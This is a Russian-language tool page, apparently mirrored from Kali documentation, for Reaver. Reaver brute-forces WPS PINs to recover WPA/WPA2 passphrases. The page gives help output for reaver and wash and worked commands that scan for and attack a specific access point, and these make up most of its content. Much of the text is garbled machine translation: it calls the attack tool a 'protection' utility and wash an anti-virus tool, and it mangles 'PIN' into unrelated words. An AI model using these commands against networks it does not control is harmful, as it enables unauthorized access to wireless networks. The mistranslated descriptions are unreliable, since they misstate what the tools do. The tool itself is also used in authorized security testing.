//kalinux.info
Wireless Attacks 471 просмотров

Reaver

Описание пакета Reaver

Reaver реализует грубую силовую атаку на PIN-коды регистратора Wifi Protected Setup (WPS) для восстановления кодовых фраз WPA / WPA2, как описано в http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.

Reaver был разработан, чтобы быть надежной и практичной атакой против WPS и был протестирован против множества точек доступа и WPS-реализаций.

В среднем Reaver будет восстанавливать кодовую фразу WPA / WPA2 целевой точки AP в течение 4-10 часов, в зависимости от точки доступа. На практике обычно потребуется половина этого времени, чтобы угадать правильный вывод WPS и восстановить кодовую фразу

Инструменты, включенные в пакет reaver

reaver - инструмент защиты от удаленной установки WiFi


root @ kali: ~ # reaver -h 

Reaver v1.4 WiFi Protected Setup Attack Tool 
Авторские права (c) 2011, Тактические сетевые решения, Craig Heffner <cheffner@tacnetsol.com> 

Необходимые аргументы: 
    -i, --interface=<wlan>         Имя интерфейса режима мониторинга для использования 
    -b, --bssid=<mac>              BSSID целевой AP 

Дополнительные аргументы: 
    -m, --mac=<mac>                MAC хост-системы 
    -e, -essid=<ssid>              ESSID целевого AP 
    -c, --channel=<channel>        Установить канал 802.11 для интерфейса (подразумевает -f) 
    -o, --out-file=<file>          Отправлять вывод в файл журнала [stdout] 
    -s, --session=<file>           Восстановить предыдущий файл сеанса
    -C, --exec=<command>           Выполнять прилагаемую команду при успешном восстановлении контактов 
    -D, --daemonize                Daemonize reaver 
    -a, --auto                     Автоматическое обнаружение лучших расширенных параметров для целевой точки доступа 
    -f, --fixed                    Отключить переключение каналов 
    -5, --5ghz                     Использовать 5GHz 802.11 
    -v, --verbose                  Отображать некритические предупреждения (-vv для большего) 
    -q, --quiet                    Показывать только критические сообщения 
    -h, --help                     Показать справку 

Дополнительные параметры: 
    -p, --pin=<wps pin>            Используйте указанный 4 или 8-значный вывод WPS
    -d, --delay=<seconds>          Установить задержку между попытками булавки [1] 
    -l, -lock-delay=<seconds>      Установить время ожидания, если AP блокирует попытки нажатия WPS [60] 
    -g, --max-try=<num>            Выход после попыток num pin 
    -x, --fail-wait=<seconds>      Устанавливает время ожидания после 10 неожиданных сбоев [0] 
    -r, --recurring-delay=<x:y>    Спящий режим в течение каждых секунд каждые каждые x выводов 
    -t, --timeout=<seconds>        Установите период ожидания приема [5] 
    -T, --m57-timeout =<seconds>   Установите период ожидания M5 / M7 [0,20] 
    -A, --no-associate             Не связывайтесь с AP (ассоциация должна выполняться другим приложением)
    -N, --no-nacks                 Не отправлять сообщения NACK, когда из пакетов заказов принимаются 
    -S, --dh-small                 Используйте небольшие ключи DH для улучшения скорости трещины 
    -L, --ignore-locks             Игнорировать заблокированное состояние, сообщаемое target AP 
    -E, --eap-terminate            Завершить каждый сеанс WPS с помощью пакета EAP FAIL 
    -n, --nack                     Target AP всегда отправляет NACK [Auto] 
    -w, --win7                     Mimic регистратор Windows 7 [False] 

Пример: 
    reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

wash - инструмент сканирования защищенных настроек WiFi


root @ kali: ~ # wash -h 

Wash v1.4 
Утилита для защиты от вирусов с помощью WiFi Protective Copyright (c) 2011, тактические сетевые решения, Craig Heffner <cheffner@tacnetsol.com> 

Необходимые аргументы: 
    -i, --interface=<iface>              Интерфейс для захвата пакетов в 
    -f, --file [FILE1 FILE2 FILE3 ...]   Чтение пакетов из файлов захвата. 

Дополнительные аргументы: 
    -c, --channel=<num>                  Канал для прослушивания [auto] 
    -o, -out-file=<file>                 Запись данных в файл 
    -n, --probes=<num>                   Максимальное количество зондов для отправки каждой точке доступа в режиме сканирования [15] 
    -D, --daemonize                      Очистка демона
    -C, --ignore-fcs                     Игнорировать ошибки контрольной суммы кадра
    -5, --5ghz                           Использовать 5GHz 802.11 каналов 
    -s, --scan                           Использовать режим сканирования 
    -u, --survey                         Использовать режим опроса [по умолчанию] 
    -h, --help                           Показать справку 

Пример: 
    wash -i mon0

Пример использования wash

Сканирование сетей, использующих интерфейс режима монитора (-i mon0) на канале 6 (-c 6) , при игнорировании ошибок контрольной суммы кадра (-C):


root@kali:~# wash -i mon0 -c 6 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
------------------------------------------------------------------------------------------------
E0:3F:49:6A:57:78       6            -73        1.0               No                ASUS

Пример использования reaver

Используйте интерфейс режима монитора (-i mon0), чтобы атаковать точку доступа (-b E0: 3F: 49: 6A: 57: 78) , отображая подробный вывод (-v):

root @ kali: ~ # reaver -i mon0 -b E0: 3F: 49: 6A: 57: 78 -v 

Reaver v1.4 
Утилита защиты от удаленной установки WiFi с защитой авторских прав (c) 2011, тактические сетевые решения, Craig Heffner  

[+] Ожидание маяка от E0:3F:49:6A:57:78 
[+] Связано с E0:3F:49:6A:57:78 (ESSID: ASUS) 
[+] Пинк 12345670